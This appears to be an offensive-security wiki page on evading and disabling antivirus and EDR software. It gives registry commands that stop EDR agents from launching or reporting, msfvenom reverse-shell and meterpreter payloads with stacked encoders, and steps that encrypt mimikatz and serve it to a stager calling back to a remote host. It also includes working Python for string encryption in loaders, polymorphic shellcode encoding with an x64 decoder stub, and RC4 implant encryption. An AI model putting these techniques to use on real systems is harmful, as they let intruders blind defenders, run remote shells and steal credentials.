# AV / EDR Evasion

* <https://hacker.house/lab/windows-defender-bypassing-for-meterpreter/>
* <https://codeby.net/threads/meterpreter-snova-v-dele-100-fud-with-metasploit-5.66730/>
* <https://github.com/phackt/stager.dll>
* <https://medium.com/securebit/bypassing-av-through-metasploit-loader-32-bit-6d62930151ad>
* <https://medium.com/securebit/bypassing-av-through-metasploit-loader-64-bit-9abe55e3e0c8>
* <https://xakep.ru/2020/12/23/shikata-ga-nai/>
* <https://infosecwriteups.com/evade-avs-edr-with-shellcode-injection-159dde4dba1a?gi=84db9a8c5c5f>
* <https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/>
* <https://luemmelsec.github.io/Circumventing-Countermeasures-In-AD/>
* <https://blog.sunggwanchoi.com/creating-a-loader-poc-using-various-languages/>
* <https://sevrosecurity.com/2019/05/25/bypass-windows-defender-with-a-simple-shell-loader/>
* <https://xakep.ru/2021/07/23/detection-bypassing/>
* <https://zen.yandex.ru/media/id/5d4f02da027a1500ad43866f/obhodim-antivirusy-kriptor-net-prilojenii-5fc6a199a8f33a1036140386>
* <https://www.synacktiv.com/publications/a-dive-into-microsoft-defender-for-identity.html>

![BypassAV Mindmap](https://raw.githubusercontent.com/CMEPW/BypassAV/main/img/Bypass-AV.png)

## Toy EDRs

* <https://xacone.github.io/BestEdrOfTheMarket.html>
* <https://sensepost.com/blog/2024/sensecon-23-from-windows-drivers-to-an-almost-fully-working-edr/>
* <https://github.com/Helixo32/CrimsonEDR>
* <https://github.com/0xflux/Sanctum>

## Recon

* <https://github.com/ethereal-vx/Antivirus-Artifacts>
* <https://github.com/Mr-Un1k0d3r/EDRs>

Enumerate registered AV products and running AV processes on hosts (the `SecurityCenter2` namespace is readable as a standard user but exists only on workstation SKUs, not on Windows Server; the remote `Win32_Process` sweep needs local admin on each target):

```
Cmd > WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
PS > Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
PS > gc .\100-hosts.txt | % {gwmi -Query "select * from Win32_Process" -ComputerName $_ | ? {$_.Caption -in "MsMpEng.exe"} | select ProcessName,PSComputerName}
```

Identify the installed .NET Framework version by inspecting the file version of the CLR assembly itself:

```
PS > cd C:\Windows\Microsoft.NET\Framework64\
PS > ls
PS > cd .\v4.0.30319\
PS > Get-Item .\clr.dll | Fl
PS > # or
PS > [System.Diagnostics.FileVersionInfo]::GetVersionInfo($(Get-Item .\clr.dll)).FileVersion
```

Identify the .NET Framework version from the registry (the `Release` DWORD encodes the version; a value of 528040 or higher means 4.8 or later):

```
PS > Get-ItemProperty "HKLM:SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full" -Name Release
```

Windows 10 build <-> default (in-box) .NET Framework version associations:

| Windows Build | Default .NET Framework Version |
| ------------- | ------------------------------ |
| 1511          | 4.6.1                          |
| 1607          | 4.6.2                          |
| 1703          | 4.7                            |
| 1709          | 4.7.1                          |
| 1803, 1809    | 4.7.2                          |
| 1903+         | 4.8                            |

.NET Framework version <-> CLR version associations:

| .NET Framework Version | CLR Version |
| ---------------------- | ----------- |
| 2.0, 3.0, 3.5          | 2           |
| 4, 4.5-4.8             | 4           |

{% hint style="info" %}
Note that we don't have to target the exact .NET Framework version when compiling our tools. It's enough to match the above relationship between .NET Framework version and CLR version, i.e. all 4.x versions will execute on CLR v4. For example, Rubeus compiled to target v4.5 will run on a machine with only .NET v4.0 installed, as long as it does not call an API that was only added in a later 4.x release (in which case the assembly loads but fails at runtime with a `MissingMethodException` or `TypeLoadException`).
{% endhint %}

Potential scan exclusions (directories covered by Defender's automatic server-role exclusions for IIS, failover clustering and Hyper-V; confirm the role is actually installed on the target before relying on them):

* `C:\Windows\System32\LogFiles\`
* `C:\Windows\System32\inetsrv\`
* `C:\Windows\ClusterStorage\`
* `C:\ProgramData\Microsoft\Windows\Hyper-V\`

## Attacking EDRs

* <https://mansk1es.gitbook.io/edr-binary-abuse/>
* <https://xss.is/threads/67718/>
* <https://www.safebreach.com/blog/dark-side-of-edr-offensive-tool/>
* <https://www.alteredsecurity.com/post/when-the-hunter-becomes-the-hunted-using-custom-callbacks-to-disable-edrs>
* <https://beierle.win/2024-12-20-Weaponizing-WDAC-Killing-the-Dreams-of-EDR/>
* <https://github.com/arosenmund/defcon33_silence_kill_edr>

**Hard-style** launch prevention using [IFEO](https://learn.microsoft.com/en-us/previous-versions/windows/desktop/xperf/image-file-execution-options): a `Debugger` value makes `CreateProcess` launch the named "debugger" with the original command line as its argument instead of the EDR image (requires admin and persists across reboots until the value is removed):

```
Cmd > reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<EDR_IMAGE.exe>" /t REG_SZ /v Debugger /d "C:\Windows\System32\rundll32.exe" /f
```

**Hard-style** launch prevention using [BootExecute](https://github.com/rad9800/BootExecuteEDR):

```
Cmd > reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v "BootExecute" /t REG_MULTI_SZ /d "autocheck autochk *\0BEB" /f
Cmd > reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v "BootExecuteNoPnpSync" /t REG_MULTI_SZ /d "BEB" /f
Cmd > reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v "SetupExecute" /t REG_MULTI_SZ /d "BEB" /f
Cmd > reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" /v "PlatformExecute" /t REG_MULTI_SZ /d "BEB" /f
```

**Hard-style** launch prevention using PPL process start:

* <https://www.zerosalarium.com/2025/08/countering-edrs-with-backing-of-ppl-protection.html>
* <https://github.com/2x7EQ13/CreateProcessAsPPL>

### WFP-Based Prisons

* <https://www.mdsec.co.uk/2023/09/nighthawk-0-2-6-three-wise-monkeys/>

#### EDRSilencer

* <https://github.com/netero1010/EDRSilencer/tree/main>

#### EDRPrison

* <https://www.3nailsinfosec.com/post/edrprison-borrow-a-legitimate-driver-to-mute-edr-agent>
* <https://github.com/senzee1984/EDRPrison>

#### WinDivert

* <https://reqrypt.org/windivert-doc.html>
* <https://github.com/basil00/Divert/wiki/WinDivert-Documentation>

**.NET:**

* <https://github.com/TechnikEmpire/WinDivertSharp>
* <https://github.com/xljiulang/WindivertDotnet>

**Python:**

* <https://github.com/ffalcinelli/pydivert>
* <https://github.com/shuxin/pydivert>
* <https://github.com/xshiraori/PyDivert2>

### ARP Spoofing + Scapy

* <https://tierzerosecurity.co.nz/2024/07/23/edr-telemetry-blocker.html>
* <https://github.com/TierZeroSecurity/edr_blocker>

### Name Resolution Policy Table

* <https://cloudbrothers.info/en/edr-silencers-exploring-methods-block-edr-communication-part-1/>

Add a rule that sends DNS queries for the EDR backend namespace to loopback, where nothing answers, so the agent can no longer resolve its server, then flush the resolver cache:

```
PS > Add-DnsClientNrptRule -Namespace "web-panel.edr.megacorp.local" -NameServers 127.0.0.1 -Comment "MegaCorp EDR Web Panel"
PS > Clear-DnsClientCache -Confirm:$false
```

Remove rule:

```
PS > Get-DnsClientNrptRule -Namespace "web-panel.edr.megacorp.local" | Remove-DnsClientNrptRule -PassThru -Confirm:$false -Force
```

## EDR Blindspots

### Bring Your Own Interpreter (BYOI)

* <https://synzack.github.io/Bring-Your-Own-Interpreter/>

#### Python

* <https://github.com/hakril/PythonForWindows>
* <https://trustedsec.com/blog/operating-inside-the-interpreted-offensive-python>
* <https://github.com/Teach2Breach/rpeloader>

**Pyramid**

* <https://www.naksyn.com/edr%20evasion/2022/09/01/operating-into-EDRs-blindspot.html>
* <https://github.com/naksyn/Pyramid>
* <https://github.com/naksyn/Embedder>
* <https://gist.github.com/snovvcrash/39263ccae8e07210c3f87c9472b4c908>

**BOFs with Python**

* <https://github.com/rkbennett/pybof>
* <https://tishina.in/execution/python-inmemory-bof>
* <https://github.com/zimnyaa/inmembof.py>
* <https://github.com/ELMERIKH/PyinMemoryPE>

**Python RDI**

* <https://github.com/rapid7/metasploit-payloads/tree/master/c/meterpreter/source/extensions/python>
* <https://github.com/n1nj4sec/pupy/tree/unstable/client/sources>

### Backdoor Electron Applications (JavaScript)

* <https://www.ibm.com/think/x-force/bypassing-windows-defender-application-control-loki-c2>
* <https://github.com/boku7/Loki>

## PE Obfuscation

* <https://blog.es3n1n.eu/posts/obfuscator-pt-1>

### OLLVM

* <https://0xpat.github.io/Malware_development_part_6/>
* <https://trustedsec.com/blog/behind-the-code-assessing-public-compile-time-obfuscators-for-enhanced-opsec>
* <https://github.com/icyguider/Shhhloader>
* <https://hub.docker.com/repository/docker/snovvcrash/ollvm13>
* <https://github.com/jonpalmisc/limoncello>
* <https://github.com/janoglezcampos/llvm-yx-callobfuscator>

Install LLVM 13.x obfuscator based on [heroims/obfuscator](https://github.com/heroims/obfuscator) and [tpoechtrager/wclang](https://github.com/tpoechtrager/wclang):

```bash
apk update
apk add --no-cache build-base cmake git python3 mingw-w64-gcc
rm -rf /var/cache/apk/*
git clone --depth=1 -b llvm-13.x --single-branch https://github.com/heroims/obfuscator /opt/ollvm
cd /opt/ollvm
wget https://github.com/llvm/llvm-project/commit/ff1681ddb303223973653f7f5f3f3435b48a1983.patch
patch llvm/include/llvm/Support/Signals.h < ff1681ddb303223973653f7f5f3f3435b48a1983.patch
mkdir build
cd build
cmake -DCMAKE_BUILD_TYPE=Release -DLLVM_ENABLE_NEW_PASS_MANAGER=OFF ../llvm
sed -i 's/LLVM_TOOL_CLANG_BUILD:BOOL=OFF/LLVM_TOOL_CLANG_BUILD:BOOL=ON/g' CMakeCache.txt
sed -i "s|LLVM_EXTERNAL_CLANG_SOURCE_DIR:PATH=|LLVM_EXTERNAL_CLANG_SOURCE_DIR:PATH=`realpath ../clang`|g" CMakeCache.txt
make -j7
make install
git clone --depth=1 https://github.com/tpoechtrager/wclang /opt/wclang
cd /opt/wclang
cmake .
make -j7
make install
rm -rf /opt/ollvm /opt/wclang && mkdir /build
```

### TinyCC

* <https://bellard.org/tcc/>
* <https://github.com/DosX-dev/obfus.h>

```
PS > curl https://download.savannah.gnu.org/releases/tinycc/tcc-0.9.27-win64-bin.zip -o tcc.zip
PS > Expand-Archive .\tcc.zip -DestinationPath .
PS > rm tcc.zip; cd tcc
PS > curl https://github.com/DosX-dev/obfus.h/raw/refs/heads/main/include/obfus.h -o obfus.h
PS > curl https://download.savannah.gnu.org/releases/tinycc/winapi-full-for-0.9.27.zip -o tcc-winapi.zip
PS > Expand-Archive .\tcc-winapi.zip -DestinationPath .
PS > rm tcc-winapi.zip
PS > Copy-Item -Path .\winapi-full-for-0.9.27\include\* -Destination .\include\ -Recurse -Force
PS > .\tcc.exe -w -DVIRT -DCFLOW_V2 -DANTIDEBUG_V2 -o msgbox.exe msgbox.c -luser32
```

### String Encryption

* <https://gist.github.com/EvanMcBroom/ad683e394f84b623da63c2b95f6fb547>
* <https://github.com/skadro-official/skCrypter>
* <https://github.com/trustedsec/The_Shelf/blob/main/POC/impacketremoteshell/RemoteMaint/stringobf.h>
* <https://github.com/Evi1Grey5/Bypass-Smartscreen-/blob/main/obfuscate.h>
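An added example of the build-time approach the headers above implement, written here rather than taken from the page or from obfus.h / skCrypter: a Python generator that XOR-encrypts each string under its own random key and emits a C header with the ciphertext arrays plus `xs_decrypt`/`xs_wipe` helpers and `XS_USE`/`XS_WIPE` macros (all names and the sample strings are this example's own assumptions). The plaintext never appears in `.rdata`; the consumer decrypts into a stack buffer immediately before use and wipes it afterwards.

```python
#!/usr/bin/env python3
"""Generate a C header with XOR-encrypted string literals.

Added example for the String Encryption section; not code from the page or
from obfus.h / skCrypter. Each string gets its own random multi-byte key, so
the plaintext never lands in the compiled binary's .rdata; the caller
decrypts into a stack buffer right before use and wipes it afterwards.
"""
from __future__ import annotations

import os
import re

# Constructed sample input: strings that would otherwise be trivially
# greppable in a loader (module/API names, paths).
SAMPLE_STRINGS = {
    "s_ntdll": "ntdll.dll",
    "s_virtualalloc": "VirtualAlloc",
    "s_exclusion_dir": "C:\\Windows\\System32\\LogFiles\\",
}

C_IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same function encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encrypt_string(s: str, key_len: int = 8, rng=os.urandom) -> tuple[bytes, bytes]:
    """Return (key, ciphertext) for s plus its NUL terminator.

    Encrypting the terminator too means the blob has no fixed 0x00 trailer,
    and the decrypted buffer is a ready-to-use C string.
    """
    plain = s.encode() + b"\x00"
    key = rng(key_len)
    return key, xor_bytes(plain, key)


def c_array(name: str, data: bytes) -> str:
    """Render bytes as a static const unsigned char array."""
    body = ", ".join(f"0x{b:02x}" for b in data)
    return f"static const unsigned char {name}[{len(data)}] = {{ {body} }};"


def generate_header(strings: dict[str, str], key_len: int = 8, rng=os.urandom) -> str:
    """Emit a self-contained header: key/ciphertext arrays, decrypt and wipe helpers."""
    for name in strings:
        if not C_IDENT.fullmatch(name):
            raise ValueError(f"not a valid C identifier: {name!r}")
    out = [
        "/* generated: XOR-encrypted strings, decrypt on the stack right before use */",
        "#pragma once",
        "#include <stddef.h>",
        "",
        "static inline void xs_decrypt(char *dst, const unsigned char *enc, size_t n,",
        "                              const unsigned char *key, size_t klen) {",
        "    for (size_t i = 0; i < n; i++) dst[i] = (char)(enc[i] ^ key[i % klen]);",
        "}",
        "/* volatile store so the compiler cannot drop the wipe as a dead write */",
        "static inline void xs_wipe(char *p, size_t n) {",
        "    volatile char *v = p; while (n--) *v++ = 0;",
        "}",
        "/* XS_USE(buf, NAME): declare a stack buffer and fill it with NAME's plaintext */",
        "#define XS_USE(buf, NAME) \\",
        "    char buf[sizeof(NAME##_enc)]; \\",
        "    xs_decrypt(buf, NAME##_enc, sizeof(NAME##_enc), NAME##_key, sizeof(NAME##_key))",
        "#define XS_WIPE(buf) xs_wipe((buf), sizeof(buf))",
        "",
    ]
    for name, s in strings.items():
        key, enc = encrypt_string(s, key_len, rng)
        out.append(c_array(f"{name}_key", key))
        out.append(c_array(f"{name}_enc", enc))
        out.append("")
    return "\n".join(out)


def decrypt_blob(enc: bytes, key: bytes) -> str:
    """Python mirror of xs_decrypt, used to verify generated output."""
    plain = xor_bytes(enc, key)
    if not plain.endswith(b"\x00"):
        raise ValueError("decrypted blob is not NUL-terminated: wrong key?")
    return plain[:-1].decode()


if __name__ == "__main__":
    print(generate_header(SAMPLE_STRINGS))
```

Usage: `python3 gen_strings.py > strings.h`, then in the loader `XS_USE(name, s_virtualalloc); p = GetProcAddress(h, name); XS_WIPE(name);`. This defeats static string scanning and `strings`-style triage only; an emulator or a memory dump taken after `XS_USE` sees the plaintext, and a short repeating key is not encryption in any cryptographic sense.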

### Tools

* <https://github.com/mike1k/perses>
* <https://github.com/weak1337/Alcatraz>
* <https://github.com/es3n1n/obfuscator>
* <https://github.com/d35ha/CallObfuscator>
* <https://github.com/ac3ss0r/obfusheader.h>
* <https://github.com/EgeBalci/deoptimizer>
* <https://github.com/DosX-dev/Astral-PE>
* <https://github.com/x86byte/Obfusk8>

## Shellcode Mutation

* <https://g3tsyst3m.com/shellcode/pic/Let's-Create-Some-Polymorphic-PIC-Shellcode!/>
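An added example of the simplest form of the mutation discussed above (this page's own illustration, not code from the linked post or any of the tools listed below): a Python encoder that wraps raw x64 shellcode in a rolling-XOR layer with a fresh key and key increment on every build and prepends a matching 25-byte position-independent decoder stub, so each output differs byte-for-byte while decoding to the same payload. It assumes the blob is placed in RWX memory (the stub patches the bytes after itself in place) and that clobbering `rax`, `rcx` and `rsi` at entry is acceptable; the function names and the sample "shellcode" are this example's own.

```python
#!/usr/bin/env python3
"""Rolling-XOR shellcode mutation with a generated x64 decoder stub.

Added example for the Shellcode Mutation section (not from the page or any
linked project). Every call picks a fresh key byte and key increment, so the
encoded payload and the stub's immediates change on each build while the
decoded shellcode is unchanged. The stub must run from RWX memory because it
patches the bytes that follow it in place, and it clobbers rax/rcx/rsi.
"""
from __future__ import annotations

import os
import struct

STUB_LEN = 25


def rolling_xor(data: bytes, key: int, delta: int) -> bytes:
    """XOR each byte with a key that advances by `delta` (mod 256) per byte.

    The same routine encodes and decodes, which is exactly what the stub does.
    """
    out = bytearray()
    k = key
    for b in data:
        out.append(b ^ k)
        k = (k + delta) & 0xFF
    return bytes(out)


def build_stub(length: int, key: int, delta: int) -> bytes:
    """x64 decoder, 25 bytes, position independent.

    lea  rsi, [rip + 18]   ; 48 8D 35 12 00 00 00  -> first payload byte
    mov  ecx, length       ; B9 imm32
    mov  al, key           ; B0 imm8
    loop:
    xor  [rsi], al         ; 30 06
    add  al, delta         ; 04 imm8   (rolling key)
    inc  rsi               ; 48 FF C6
    dec  ecx               ; FF C9
    jnz  loop              ; 75 F5     (-11 back to xor)
    <payload follows>
    """
    if not 0 < length <= 0xFFFFFFFF:
        raise ValueError("bad payload length")
    stub = (
        b"\x48\x8D\x35" + struct.pack("<i", 18)
        + b"\xB9" + struct.pack("<I", length)
        + b"\xB0" + bytes([key & 0xFF])
        + b"\x30\x06"
        + b"\x04" + bytes([delta & 0xFF])
        + b"\x48\xFF\xC6"
        + b"\xFF\xC9"
        + b"\x75" + struct.pack("<b", -11)
    )
    assert len(stub) == STUB_LEN
    return stub


def mutate(shellcode: bytes, rng=os.urandom) -> tuple[bytes, int, int]:
    """Return (stub + encoded shellcode, key, delta) with random key/delta.

    delta is forced odd so the key walks through all 256 values before it
    repeats, avoiding long runs of identical key bytes in the output.
    """
    key = rng(1)[0]
    delta = rng(1)[0] | 1
    encoded = rolling_xor(shellcode, key, delta)
    return build_stub(len(shellcode), key, delta) + encoded, key, delta


def emulate(blob: bytes) -> bytes:
    """Recover the payload by parsing the stub's immediates and replaying its loop.

    A cheap self-check that the emitted immediates match the encoding applied,
    without needing a CPU emulator.
    """
    stub, payload = blob[:STUB_LEN], blob[STUB_LEN:]
    if stub[:3] != b"\x48\x8D\x35" or stub[7] != 0xB9 or stub[12] != 0xB0 \
            or stub[23:25] != b"\x75\xF5":
        raise ValueError("not a stub produced by build_stub")
    length = struct.unpack_from("<I", stub, 8)[0]
    key, delta = stub[13], stub[17]
    if len(payload) != length:
        raise ValueError("payload length does not match stub immediate")
    return rolling_xor(payload, key, delta)


# Constructed sample "shellcode": not a real payload, just recognisable bytes
# (x64 int3 padding followed by ret) so the round trip is easy to inspect.
SAMPLE_SHELLCODE = b"\xCC" * 16 + b"\xC3"

if __name__ == "__main__":
    a, _, _ = mutate(SAMPLE_SHELLCODE)
    b, _, _ = mutate(SAMPLE_SHELLCODE)
    print("outputs differ:", a != b, "| both decode:", emulate(a) == emulate(b) == SAMPLE_SHELLCODE)
```

Feed `msfvenom -f raw` output to `mutate()` and write the returned blob where the loader expects its shellcode. The stub itself is constant apart from two immediates, so a signature on those 25 bytes still catches every build; real polymorphism also varies the decoder (register choice, instruction substitution, junk insertion), which is what the tools below do.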

### Tools

* <https://medium.com/@0x0vid/same-same-but-different-a-dive-into-keyless-polymorphism-7570c1def3e2>
* <https://github.com/codewhitesec/Lastenzug/tree/main/LastenPIC/SpiderPIC>
* <https://github.com/tijme/dittobytes>
* <https://github.com/gum3t/chameleon>

## PowerShell Tactics

* <https://github.com/specterops/at-ps>
* <https://telegra.ph/Komandy-PowerShell-dlya-pentesterov-03-01>

### PowerShell Obfuscation

* <https://github.com/BC-SECURITY/Beginners-Guide-to-Obfuscation>
* <https://github.com/t3l3machus/PowerShell-Obfuscation-Bible>
* <https://github.com/tokyoneon/Chimera>
* <https://github.com/klezVirus/chameleon>
* <https://github.com/AdrianVollmer/PowerHub>

#### Invoke-Obfuscation

* <https://github.com/danielbohannon/Invoke-Obfuscation>
* <https://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation-usage-guide>

#### Out-EncryptedScript.ps1

* <https://github.com/PowerShellMafia/PowerSploit/blob/master/ScriptModification/Out-EncryptedScript.ps1>
* <https://powersploit.readthedocs.io/en/latest/ScriptModification/Out-EncryptedScript/>

```
PS > Out-EncryptedScript .\script.ps1 $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force) s4lt -FilePath .\evil.ps1
PS > . .\evil.ps1
PS > $dec = de "Passw0rd!" s4lt
PS > Invoke-Expression $dec
```

#### PowerShellArmoury

* <https://github.com/cfalta/PowerShellArmoury>
* <https://cyberstoph.org/posts/2019/12/evading-anti-virus-with-powershell-armoury/>
* <https://cyberstoph.org/posts/2020/02/psarmoury-1.4-now-with-even-more-armour/>

```
PS > git clone https://github.com/cfalta/PowerShellArmoury
PS > cd PowerShellArmoury
PS > curl https://github.com/snovvcrash/WeaponizeKali.sh/raw/main/conf/PSArmoury.json -o PSArmoury.json
PS > . .\New-PSArmoury.ps1
PS > New-PSArmoury -ValidateOnly -Config PSArmoury.json
PS > New-PSArmoury -Path armored.ps1 -Config PSArmoury.json
PS > cat -raw .\armored.ps1 | iex
```

## Tools

### msfvenom

```
$ msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 -a x86 --platform win -e x86/shikata_ga_nai -i 3 -f exe -o rev.exe
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 -e x86/shikata_ga_nai -i 9 -f raw | msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 11 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 6 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 7 -k -f exe -o met.exe
```

### Veil-Evasion

Hyperion + PEScrambler (the crypter and PE scrambler bundled with Veil-Evasion, run under Wine):

```
$ wine hyperion.exe input.exe output.exe
$ wine PEScrambler.exe -i input.exe -o output.exe
```

### GreatSCT

* <https://github.com/GreatSCT/GreatSCT>

{% embed url="https://youtu.be/krC5j1Ab44I?t=3730" %}

Install and generate a payload:

```
$ git clone https://github.com/GreatSCT/GreatSCT ~/tools/GreatSCT
$ cd ~/tools/GreatSCT/setup
$ ./setup.sh
$ cd .. && ./GreatSCT.py
...generate a payload...
$ ls -la /usr/share/greatsct-output/handlers/payload.{rc,xml}

$ msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
```

Exec with `msbuild.exe` and get a shell:

```
PS > cmd /c C:\Windows\Microsoft.NET\framework\v4.0.30319\msbuild.exe payload.xml
```

### Ebowla

```
$ git clone https://github.com/Genetic-Malware/Ebowla ~/tools/Ebowla && cd ~/tools/Ebowla
$ sudo apt install golang mingw-w64 wine python-dev -y
$ sudo python -m pip install configobj pyparsing pycrypto pyinstaller
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.13.37 LPORT=1337 --platform win -f exe -a x64 -o rev.exe
$ vi genetic.config
... Edit output_type, payload_type, clean_output, [[ENV_VAR]] ...
$ python ebowla.py rev.exe genetic.config && rm rev.exe
$ ./build_x64_go.sh output/go_symmetric_rev.exe.go ebowla-rev.exe [--hidden] && rm output/go_symmetric_rev.exe.go
[+] output/ebowla-rev.exe
```

### PEzor

* <https://github.com/phra/PEzor>

Wrap executable into PEzor:

```
$ bash PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=10 evil.exe -z 2
```

### inceptor

* <https://klezvirus.github.io/RedTeaming/AV_Evasion/CodeExeNewDotNet/>
* <https://github.com/klezVirus/inceptor>

### ScareCrow

* <https://github.com/optiv/ScareCrow>
* <https://www.grahamhelton.com/blog/scarecrow/>
* <https://adamsvoboda.net/evading-edr-with-scarecrow/>

### charlotte

* <https://github.com/9emin1/charlotte>
* <https://github.com/cepxeo/dll4shell>

```
$ sudo apt install 'mingw-w64*' -y
$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.13.37 LPORT=1337 -f raw > beacon.bin
$ python charlotte.py
Cmd > rundll32.exe charlotte.dll, <XOR_KEY>
```

### MeterPwrShell

* <https://github.com/GetRektBoy724/MeterPwrShell/releases>
* <https://raikia.com/tool-powershell-encoder/>

```
$ sudo ./MeterPwrShell2Kalix64 -c noaptupdate
```

### stager\_libpeconv

* <https://github.com/tothi/stager_libpeconv>
* <https://github.com/hasherezade/libpeconv>

```
$ git clone --recurse-submodules https://github.com/tothi/stager_libpeconv && cd stager_libpeconv
$ openssl enc -rc4 -in mimikatz.exe -K `echo -n '1234567890123456' | xxd -p` -nosalt -out mimikatz.rc4
$ make stager IMPLANT_IP=10.10.13.37 IMPLANT_PORT=1337 RC4_KEY=1234567890123456
$ ./socket_binary_server.py mimikatz.rc4 10.10.13.37 1337
Cmd > dist\stager.exe
```
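An added example (not code from stager_libpeconv or libpeconv) that replaces the `openssl enc -rc4` step above with a pure-Python RC4, so the implant can be encrypted on a box without OpenSSL and still be decrypted by a stager built with the same `RC4_KEY`. It mirrors the page's invocation exactly: the ASCII key bytes are used raw, no salt or IV, and the key must be 16 bytes because `openssl -rc4` uses a fixed 128-bit key size. The function names, the `is_pe` check and the sample blob are this example's own.

```python
#!/usr/bin/env python3
"""RC4-encrypt an implant for stager_libpeconv without openssl.

Added example (not code from stager_libpeconv or libpeconv). Produces the same
bytes as `openssl enc -rc4 -K <hexkey> -nosalt` for a 16-byte key, so the
output can be served by socket_binary_server.py and decrypted by a stager
built with the same RC4_KEY. RC4 provides no integrity: it hides the PE from
on-the-wire signature matching, nothing more.
"""
import sys
from pathlib import Path

OPENSSL_RC4_KEY_LEN = 16  # `openssl enc -rc4` is the 128-bit variant


def rc4_keystream(key: bytes):
    """Generator yielding RC4 keystream bytes (KSA, then PRGA)."""
    if not 1 <= len(key) <= 256:
        raise ValueError("RC4 key must be 1..256 bytes")
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    i = j = 0
    while True:                               # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        yield S[(S[i] + S[j]) & 0xFF]


def rc4(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt (symmetric) `data` under `key`."""
    ks = rc4_keystream(key)
    return bytes(b ^ next(ks) for b in data)


def encrypt_implant(pe: bytes, key: str) -> bytes:
    """Mirror of the page's openssl command: the ASCII RC4_KEY is used raw,
    exactly as `-K $(echo -n KEY | xxd -p)` passes its bytes, with no salt/IV.
    Rejects keys that are not 16 bytes, since openssl would silently pad or
    truncate them and the stager's key would no longer match.
    """
    raw = key.encode()
    if len(raw) != OPENSSL_RC4_KEY_LEN:
        raise ValueError(f"RC4_KEY must be exactly {OPENSSL_RC4_KEY_LEN} bytes to match openssl -rc4")
    return rc4(raw, pe)


def is_pe(data: bytes) -> bool:
    """Sanity check on the input (and on a decrypted round trip): 'MZ' header present."""
    return data[:2] == b"MZ"


if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit(f"usage: {sys.argv[0]} <implant.exe> <16-byte-key> <out.rc4>")
    src, key, dst = sys.argv[1:]
    blob = Path(src).read_bytes()
    if not is_pe(blob):
        sys.exit(f"{src}: not a PE file")
    Path(dst).write_bytes(encrypt_implant(blob, key))
    print(f"[+] wrote {dst} ({len(blob)} bytes)")
```

Usage: `python3 rc4_implant.py mimikatz.exe 1234567890123456 mimikatz.rc4`, then serve `mimikatz.rc4` with `socket_binary_server.py` as above. Decrypting the result with the same key must yield a buffer starting with `MZ` again; if it does not, the key on the two sides differs.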
